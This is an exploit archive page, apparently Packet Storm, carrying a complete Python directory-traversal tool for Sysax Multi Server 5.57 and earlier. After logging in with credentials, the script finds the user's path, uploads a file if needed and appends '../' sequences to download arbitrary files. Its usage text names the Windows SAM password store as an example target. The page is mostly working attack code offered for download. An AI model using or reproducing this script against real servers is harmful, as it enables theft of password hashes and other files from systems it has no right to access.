what you don't know can hurt you

Sysax Multi Server 5.57 Directory Traversal

Sysax Multi Server 5.57 Directory Traversal
Posted Apr 4, 2012
Authored by Craig Freyman

Sysax Multi Server versions 5.57 and below remote directory traversal tool that requires authentication.

tags | exploit, remote
MD5 | 8015e6c77bca5ceabb2d04bd597627ff

Sysax Multi Server 5.57 Directory Traversal

Change Mirror Download
#!/usr/bin/python
##########################################################################################################
#Title: Sysax Multi Server <= 5.57 Directory Traversal Tool (Post Auth)
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit and Server 2003 SP2 32bit
#Date Discovered: March 27, 2012
#Vendor Contacted: March 29, 2012
#Vendor Response: April 3, 2012
#Vendor Fixed: (Currently working on fix, check my site for update)
#Details: http://www.pwnag3.com/2012/04/sysax-directory-traversal-exploit.html
##########################################################################################################

import socket,sys,time,re,base64,urllib

def main():
#base64 encode the provided creds
creds = base64.encodestring(user+"\x0a"+password)

print "\n"
print "****************************************************************************"
print " Sysax Multi Server <= 5.57 Directory Traversal Tool (Post Auth) "
print " by @cd1zz www.pwnag3.com "
print " Getting "+getfile+" from " + target + " on port " + str(port)
print "****************************************************************************"

#setup post for login
login = "POST /scgi?sid=0&pid=dologin HTTP/1.1\r\n"
login += "Host: \r\n"
login += "http://"+target+"/scgi?sid=0&pid=dologin\r\n"
login += "Content-Type: application/x-www-form-urlencoded\r\n"
login += "Content-Length: 15\r\n\r\n"
login += "fd="+creds+"\n\n"

#send post and login creds
try:
r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
r.connect((target, port))
print "[*] Logging in"
r.send(login)
except Exception, e:
print "[-] Could not login"
print e

#loop the recv sock so we get the full page
page = ''
fullpage = ''
while "</html>" not in fullpage:
page = r.recv(4096)
fullpage += page
time.sleep(1)

#regex the sid from the page
global sid
sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M)
if sid is None:
print "[x] Could not login. User and pass correct?"
sys.exit(1)
time.sleep(1)

#regex to find user's path
print "[*] Finding your home path"
global path
path = re.search(r'file=[a-zA-Z]:\\[\\.a-zA-Z_0-9 ]{1,255}[\\$]',fullpage,re.M)
time.sleep(1)

#if that doesn't work, try to upload a file and check again
if path is None:
print "[-] No files found, I will try to upload one for you."
print "[-] If you don't have rights to do this, it will fail."

upload = "POST /scgi?"+str(sid.group(0))+"&pid=uploadfile_name1.htm HTTP/1.1\r\n"
upload += "Host:\r\n"
upload += "Content-Type: multipart/form-data; boundary=---------------------------97336096252362005297691620\r\n"
upload += "Content-Length: 219\r\n\r\n"
upload += "-----------------------------97336096252362005297691620\r\n"
upload += "Content-Disposition: form-data; name=\"upload_file\"; filename=\"file.txt\"\r\n"
upload += "Content-Type: text/plain\r\n"
upload += "-----------------------------97336096252362005297691620--\r\n\r\n"

u = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
u.connect((target, port))
u.send(upload + "\r\n")
page = ''
fullpage = ''
while "</html>" not in fullpage:
page = u.recv(4096)
fullpage += page
path = re.search(r'file=[a-zA-Z0-9]:\\[\\.a-zA-Z_0-9 ]{1,255}[\\$]',fullpage,re.M)
time.sleep(2)
if path is None:
print "\n[x] It failed, you probably don't have rights to upload."
print "[x] Please retry the script a few times."
print "[x] You need at least one file in the directory because we need"
print "[x] to append our directory traversal to the end of your path."
sys.exit(1)
print "[+] Got it => " + path.group(0)
time.sleep(1)
r.close()

def dirtrav():
#here is the dir trav
url = "http://"+target+"/scgi?"+str(sid.group(0))+"&"+path.group(0)+"../../../../../../../"+getfile
try:
retrieved_file = urllib.urlopen(url)
filename = raw_input("[+] Got your file. What file name do you want to save it as? ")
output = open(filename,'wb')
output.write(retrieved_file.read())
output.close()
print "[*] Done!"
except Exception, e:
print "[x] Either the file doesn't exist or you mistyped it. Error below:"
print "[x] You can also try to browse this site manually:"
print "[x] " + url
print e

def keepgoing():
cont = raw_input("[*] Do you want another file (y/n)? ")
while cont == "y":
global getfile
getfile = raw_input("[*] Enter the location of the new file: ")
dirtrav()
cont = raw_input("[*] Do you want another file (y/n)? ")
else:
sys.exit(1)

if __name__ == '__main__':
if len(sys.argv) != 6:
print "[+] Usage: ./filename <Target IP> <Port> <User> <Password> <File>"
print "[+] File examples => windows/repair/sam or boot.ini"
sys.exit(1)

target, port, user, password, getfile = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], sys.argv[5]

main()
dirtrav()
keepgoing()
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close